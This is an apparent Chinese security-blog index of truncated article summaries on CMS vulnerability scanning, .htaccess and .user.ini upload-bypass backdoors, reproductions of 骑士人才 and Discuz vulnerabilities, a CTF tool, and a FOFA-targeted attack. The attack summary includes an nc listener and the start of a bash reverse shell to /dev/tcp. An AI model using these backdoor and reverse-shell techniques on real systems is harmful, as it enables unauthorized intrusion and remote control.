摘要:
工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可... 阅读全文
摘要:
1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过创建一个txt写入(png解析为php)AddType application/x-httpd-php .png另存为... 阅读全文
摘要:
.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php... 阅读全文
摘要:
0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装 0x02 复现过程当前版本v4.2.111 点加工具,点击风格模板 Pa... 阅读全文
摘要:
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。 2、将upaod放置到网站目录下... 阅读全文
摘要:
CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312 Unicode Escape(%U) HtmlEncode ACSII Base16 Base32... 阅读全文
摘要:
1、寻找目标首先FOFA找一个环境,检测工具检测一下发现目标,开干!2、开启监听首先在vps运行nc 监听一个端口nc -lvp 666列出需要使用的反弹指令bash -i >& /dev/tcp/129.204... 阅读全文